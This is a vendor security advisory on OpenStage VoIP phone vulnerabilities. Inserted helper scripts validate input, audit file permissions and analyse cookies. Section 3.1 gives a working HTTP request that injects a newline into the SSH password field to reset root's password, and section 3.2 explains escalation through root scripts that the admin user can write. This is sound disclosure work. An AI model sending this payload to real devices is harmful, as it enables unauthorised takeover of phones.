---------------------------------------------------------------------
modzero Security Advisory: Multiple Vulnerabilities in Siemens
OpenStage VoIP Phones [MZ-14-02]
---------------------------------------------------------------------

---------------------------------------------------------------------
1. Timeline
---------------------------------------------------------------------

* 2014-07-15: Vulnerability has been discovered.
* 2014-09-15: Siemens has been contacted.
* 2014-09-15: Response from Siemens referring to Unify as new product owner.
* 2014-09-15: Unify has been contacted.
* 2014-09-16: Initial feedback by Unify.
* 2014-12-19: Status update by Unify.
* 2015-02-26: Unify published an advisory.
* 2015-06-05: modzero published updated advisory.

---------------------------------------------------------------------
2. Summary
---------------------------------------------------------------------

Vendor: Siemens, Unify

Products known to be affected:

* Siemens OpenStage 20, 40, 60
  Software release: at least OperaVersion 3.1.35.0000 (OpenStage 60)
* Certain Unify products: OpenStage SIP, OpenScape Desk Phone IP SIP

Severity: Low
Remote exploitable: Partially

The Siemens OpenStage VoIP phones run a BusyBox-based Linux. The phones use and offer several network services, including SSH access (after activation), an admin web interface and SIP signaling. modzero identified several weaknesses: an input validation vulnerability, as well as a file permission vulnerability that allows a privilege escalation.

---------------------------------------------------------------------
3. Details
---------------------------------------------------------------------

3.1 Input Validation Vulnerability via Web Interface (Severity: Low)

* CVE-2014-9563
* Products known to be affected:
  * Siemens OpenStage 20, 40, 60
    Software release: at least OperaVersion 3.1.35.0000 (OpenStage 60)
  * OpenStage / OpenScape Desk Phone IP SIP in V3 before V3 R3.32.0

To set the admin password for SSH access, the web interface code calls the local shell script "/Opera_Deploy/setPasswd.sh", which runs the Linux command "chpasswd" to perform the password reset. The input parameters that are passed from the web interface to "chpasswd" are not correctly validated. This allows an attacker with access to the admin frontend to set the passwords of more privileged system users on the phone, which the standard user interface does not permit. Thus, this vulnerability allows a privilege escalation attack.

An example POST request to the phone's built-in web server is shown below. Afterwards, the "root" user's password is set, too.
---
POST /page.cmd HTTP/1.1
Host: 10.0.23.42
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.23.42/page.cmd?page=WEBM_Admin_SecureShell&lang=de
Cookie: webm=0000|4b766b55-53c3d261
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

page_submit=WEBM_Admin_SecureShell&lang=de&ssh-enable=true&ssh-password=123456%0aroot:123456&ssh-timer-connect=10&ssh-timer-session=60
---

3.2 Privilege Escalation via SSH (Severity: Low)

* CVE-2014-8421
* Products known to be affected:
  * Siemens OpenStage 20, 40, 60
    Software release: at least OperaVersion 3.1.35.0000 (OpenStage 60)
  * OpenStage SIP before V3 R1.49.0 (release date: 2013-11-15)
  * OpenScape Desk Phone IP SIP before V3 R2.16.0 (release date: 2013-12-12)

After activating the shell access, a user may log in as user "admin" via Secure Shell. This user does not have super-user privileges. However, the web interface is based on several CGI scripts that are executed with super-user privileges, while these scripts as well as the directory "/Opera_Deploy/appWeb" are writable for the user "admin". This allows a privilege escalation: a less privileged user can gain super-user permissions by writing malicious code into the poorly protected files, which are afterwards executed with maximum privileges.
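Back to the request in section 3.1: the root cause is that the value of "ssh-password" reaches a "user:password" record for chpasswd without validation, and chpasswd reads one record per line. The script below is an added example, not the vendor's setPasswd.sh and not modzero code (the function names vulnerable_chpasswd_input, validate_password and safe_chpasswd_input are ours). It builds the record the way an unvalidated wrapper would, then the way a validated wrapper should, and feeds both the URL-decoded payload from the request above.

```shell
#!/bin/sh
# Added example for section 3.1; not the vendor's setPasswd.sh and not
# modzero code. Function names are ours. It models the "user:password"
# record that a wrapper script feeds to chpasswd, first the way an
# unvalidated script builds it, then with validation.

# Unvalidated: the password is interpolated into the chpasswd record
# as-is. chpasswd reads one "user:password" record per line, so a
# value containing a newline becomes a second record for another user.
vulnerable_chpasswd_input() {
    printf '%s:%s\n' "$1" "$2"
}

# Allow-list check for a single, unambiguous chpasswd record: non-empty,
# at most 64 characters, and only characters from a conservative set.
# Newline, carriage return, ':' (the record separator) and all other
# control or shell-significant characters fall outside the set.
validate_password() {
    pw=$1
    [ -n "$pw" ] || return 1
    [ ${#pw} -le 64 ] || return 1
    case $pw in
        *[!A-Za-z0-9_.@#%+=-]*) return 1 ;;
    esac
    return 0
}

# Validated: the user name is fixed to the one account the web UI is
# allowed to manage, and the password must pass the allow-list. Returns
# non-zero (and prints nothing) instead of emitting a bad record.
safe_chpasswd_input() {
    user=$1; pw=$2
    [ "$user" = admin ] || return 1
    validate_password "$pw" || return 1
    printf '%s:%s\n' "$user" "$pw"
}

# Demonstration with the decoded ssh-password value from the request in
# section 3.1 ("%0a" is a newline once URL-decoded).
nl='
'
payload="123456${nl}root:123456"
echo "records an unvalidated wrapper would pass to chpasswd:"
vulnerable_chpasswd_input admin "$payload"
if safe_chpasswd_input admin "$payload"; then
    echo "validated wrapper: accepted (unexpected)"
else
    echo "validated wrapper: rejected"
fi
```

Two design points: the wrapper never takes the user name from the request at all, so even a validation bypass could only touch the "admin" account, and the allow-list rejects the record separator rather than trying to escape it. Neither helps if the wrapper itself is writable by the account it is supposed to constrain, which is the problem section 3.2 describes.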
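The condition described in 3.2 (root executes files that a lesser account may write) is easy to audit from "ls -l" output of the kind shown in the listing that follows. The script below is an added example, not part of the advisory and not vendor code; the function names audit_ls_listing and audit_dir are ours, and it assumes the usual "ls -l" column order (mode, link count, owner, group, size, three date fields, path). It flags every entry that is not owned by root or that is group- or world-writable; the sample lines in the usage at the bottom are taken from the advisory's listing plus two constructed root-owned entries.

```shell
#!/bin/sh
# Added example for section 3.2; not modzero or vendor code, function
# names are ours. Reads "ls -l" lines on stdin and prints each path that
# a non-root account could modify, with the reason. Assumed column
# order: mode links owner group size date(3 fields) path.

# Exit status 0 when nothing was flagged, 1 otherwise (usable in CI or
# a post-install check on the device). Directory lines from "ls -ld"
# are handled the same way: a writable parent directory lets a file be
# replaced even when the file itself is read-only.
audit_ls_listing() {
    found=0
    while read -r mode links owner group size d1 d2 d3 path; do
        [ -n "$path" ] || continue          # skip blank and "total N" lines
        reason=''
        [ "$owner" = root ] || reason="owner=$owner"
        case $mode in
            ?????w*) reason="${reason:+$reason,}group-writable" ;;   # 6th char
        esac
        case $mode in
            ????????w*) reason="${reason:+$reason,}world-writable" ;; # 9th char
        esac
        if [ -n "$reason" ]; then
            printf '%s\t%s\n' "$path" "$reason"
            found=$((found + 1))
        fi
    done
    [ "$found" -eq 0 ]
}

# Live variant: audit all *.sh files in a directory plus the directory
# itself. On the phone this would be "audit_dir /Opera_Deploy".
audit_dir() {
    { ls -ld "$1"; ls -l "$1"/*.sh 2>/dev/null; } | audit_ls_listing
}

# Usage with lines from the advisory's listing (first two) and two
# constructed root-owned entries (last two).
printf '%s\n' \
  '-rw-rw-r-- 1 admin admin 20 Jan 1 2000 /Opera_Deploy/ConfigureCoreFile.sh' \
  '-rwxrwxr-x 1 admin admin 199 Oct 1 2012 /Opera_Deploy/setPasswd.sh' \
  '-rwxr-xr-x 1 root root 100 Oct 1 2012 /Opera_Deploy/constructed_ok.sh' \
  '-rwxr-xrwx 1 root root 100 Oct 1 2012 /Opera_Deploy/constructed_world.sh' \
  | audit_ls_listing || echo "writable-by-others scripts found (see above)"
```

The intended fix on a device like this is the mirror image of the finding: scripts that the root-owned CGI executes belong to root with mode 0755 (or stricter), and the directories holding them must not be writable by "admin" either, otherwise the permission on the file no longer matters.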
The following scripts are called with super-user privileges while being writable for user "admin":

---
$ ls -l /Opera_Deploy/*.sh
-rw-rw-r-- 1 admin admin    20 Jan  1  2000 /Opera_Deploy/ConfigureCoreFile.sh
-rwxrwxr-x 1 admin admin    64 Oct  1  2012 /Opera_Deploy/Traceroute.sh
-rwxrwxr-x 1 admin admin   538 Oct  1  2012 /Opera_Deploy/apps.sh
-rwxrwxr-x 1 admin admin  2162 Oct  1  2012 /Opera_Deploy/conversion_java2native.sh
-rw-rw-r-- 1 admin admin  1321 Oct  1  2012 /Opera_Deploy/coreCompression.sh
-rwxrwxr-x 1 admin admin    26 Oct  1  2012 /Opera_Deploy/deletePasswd.sh
-rwxrwxr-x 1 admin admin   229 Oct  1  2012 /Opera_Deploy/findHealthSvcFDs.sh
-rwxrwxr-x 1 admin admin    54 Oct  1  2012 /Opera_Deploy/fw_printenv.sh
-rwxrwxr-x 1 admin admin    35 Oct  1  2012 /Opera_Deploy/fw_setenv.sh
-rw-rw-r-- 1 admin admin   553 Oct  1  2012 /Opera_Deploy/hw_wd_kicker.sh
-rwxrwxr-x 1 admin admin 16621 Oct  1  2012 /Opera_Deploy/new_rootfs.sh
-rw-rw-r-- 1 admin admin    63 Oct  1  2012 /Opera_Deploy/opera_killSnmpd.sh
-rw-rw-r-- 1 admin admin   100 Oct  1  2012 /Opera_Deploy/opera_startSnmpd.sh
-rwxrwxr-x 1 admin admin 10372 Oct  1  2012 /Opera_Deploy/rebootOperaSoftware.sh
-rwxrwxr-x 1 admin admin   180 Oct  1  2012 /Opera_Deploy/removeLogFiles.sh
-rwxrwxr-x 1 admin admin   192 Oct  1  2012 /Opera_Deploy/runOperaServices.sh
-rwxrwxr-x 1 admin admin   199 Oct  1  2012 /Opera_Deploy/setPasswd.sh
-rwxrwxr-x 1 admin admin   163 Oct  1  2012 /Opera_Deploy/startAccTestSvcs.sh
-rwxrwxr-x 1 admin admin  2056 Oct  1  2012 /Opera_Deploy/usbNotification.sh
---

3.3 Weak Session IDs (Severity: Low)

* CVE-2014-8422
* Products known to be affected:
  * Siemens OpenStage 20, 40, 60
    Software release: at least OperaVersion 3.1.35.0000 (OpenStage 60)
  * OpenStage SIP before V3 R0.48.0 (release date: 2011-09-30)

The web interface uses session cookies to keep track of authenticated sessions for regular and administrative users. The cookie carries only little entropy.
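The cookie layout that this section goes on to describe (one half of the "webm" value is "0000", the other is a 32-bit random number joined to a 32-bit timestamp) can be decoded, and the guessing cost it leaves an attacker estimated, with the script below. It is an added example, not part of the advisory and not vendor code; the function names are ours. Its one assumption is that the timestamp is a Unix epoch in seconds, which the advisory does not state: decoding the three admin cookies quoted in this section gives values around 1405342305, i.e. 2014-07-14 UTC, one day before the discovery date in the timeline, which supports the assumption.

```shell
#!/bin/sh
# Added example for section 3.3; not modzero or vendor code, function
# names are ours. Decodes the webm cookie layout the advisory describes
# (one half "0000", the other "rrrrrrrr-tttttttt": 32-bit random value,
# 32-bit timestamp) and estimates the guessing cost. Assumption: the
# timestamp is a Unix epoch in seconds; the advisory only says "timestamp".

# Print the "rrrrrrrr-tttttttt" token from either half of a cookie value;
# accepts "webm=..." or a full "Cookie: webm=..." header line. Returns 1
# for the unauthenticated cookie "0000|0000".
cookie_token() {
    v=${1#*webm=}
    left=${v%%|*}
    right=${v#*|}
    if [ "$right" != 0000 ]; then
        printf '%s\n' "$right"          # admin cookie: token on the right
    elif [ "$left" != 0000 ]; then
        printf '%s\n' "$left"           # user cookie: token on the left
    else
        return 1
    fi
}

# The 32-bit random half, as printed in the cookie.
cookie_random() {
    t=$(cookie_token "$1") || return 1
    printf '%s\n' "${t%-*}"
}

# The timestamp half, converted from hex to a decimal epoch value.
cookie_epoch() {
    t=$(cookie_token "$1") || return 1
    printf '%d\n' "$((0x${t#*-}))"
}

# Seconds between the timestamps of two cookies (absolute value).
cookie_spread() {
    a=$(cookie_epoch "$1") || return 1
    b=$(cookie_epoch "$2") || return 1
    d=$((a - b))
    if [ "$d" -lt 0 ]; then d=$((-d)); fi
    printf '%d\n' "$d"
}

# ceil(log2(n)): bits of uncertainty left in the timestamp half once an
# observer has narrowed the login time down to a window of n seconds.
bits_for_window() {
    n=$1; b=0; p=1
    while [ "$p" -lt "$n" ]; do p=$((p * 2)); b=$((b + 1)); done
    printf '%d\n' "$b"
}

# Effective guessing cost in bits: 32 random bits plus whatever is left
# of the timestamp. A window of one second leaves exactly 32 bits.
cookie_guess_bits() {
    printf '%d\n' "$((32 + $(bits_for_window "$1")))"
}

# What a replacement should look like: 128 bits from the kernel CSPRNG,
# with no structure an observer could narrow down.
secure_session_id() {
    head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n'
    printf '\n'
}

# Walk through the three admin cookies quoted in section 3.3.
for c in 'webm=0000|4b766b55-53c3d261' \
         'webm=0000|42a1166b-53c3da35' \
         'webm=0000|734d2952-53c3dabc'; do
    printf '%s  random=%s  epoch=%s\n' "$c" "$(cookie_random "$c")" "$(cookie_epoch "$c")"
done
printf 'spread first..third: %s s\n' \
    "$(cookie_spread 'webm=0000|4b766b55-53c3d261' 'webm=0000|734d2952-53c3dabc')"
printf 'guessing cost with a 1 h window: %s bits (128 for a random id)\n' \
    "$(cookie_guess_bits 3600)"
```

The arithmetic makes the advisory's point concrete: an observer who knows the login happened within the last hour faces about 44 bits of uncertainty, within a day about 49, and within a second only the 32 random bits, against 128 bits for an identifier drawn entirely from a CSPRNG. The three quoted cookies also show the timestamp half moving forward by roughly half an hour between the first and the third, which is exactly the structure an attacker would exploit.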
The only random part is a 32-bit number, which should usually not be guessable by brute force within reasonable time. However, modzero still considers the random part of the session cookie too small.

Depending on the user and authentication state, the following cookie formats are used. "n" represents a hexadecimal digit:

* Unauthenticated cookie: webm=0000|0000
* User cookie:            webm=nnnnnnnn-nnnnnnnn|0000
* Admin cookie:           webm=0000|nnnnnnnn-nnnnnnnn

After logging in, session IDs have only little entropy, as the following examples of admin cookies show:

Cookie: webm=0000|4b766b55-53c3d261
Cookie: webm=0000|42a1166b-53c3da35
Cookie: webm=0000|734d2952-53c3dabc

The right part consists of a 32-bit random number and a 32-bit timestamp. The timestamp has only a limited amount of entropy and may be narrowed down, especially if an attacker can passively observe network traffic.

---------------------------------------------------------------------
4. Impact
---------------------------------------------------------------------

These vulnerabilities may be used to gain privileged access on OpenStage phones. This may result in a compromise of the phone setup, stolen SIP account credentials, phone fraud and exfiltration of phone calls.

---------------------------------------------------------------------
5. Workaround / Fix
---------------------------------------------------------------------

modzero recommends upgrading to the latest software version. The reported issues were fixed with OpenStage SIP V3 R3.32.0. Furthermore, modzero recommends using complex passwords for administrative interfaces and, if possible, disabling or filtering them. It is also highly recommended to separate the phones from regular networks, to limit access to vulnerable devices from other networks and vice versa.

---------------------------------------------------------------------
6. Credits
---------------------------------------------------------------------

Discovery:

* Martin Schobert (martin@modzero.ch)
* Thorsten Schröder (ths@modzero.ch)

Thanks to Stefan Beck (OpenScape Baseline Security Office) for coordinating this issue.

---------------------------------------------------------------------
7. References
---------------------------------------------------------------------

* OBSO-1501-02
  https://networks.unify.com/security/advisories/OBSO-1501-02.pdf

---------------------------------------------------------------------
8. About modzero
---------------------------------------------------------------------

The independent Swiss company modzero AG assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero AG work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs.

https://www.modzero.ch
contact@modzero.ch

---------------------------------------------------------------------
9. Disclaimer
---------------------------------------------------------------------

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.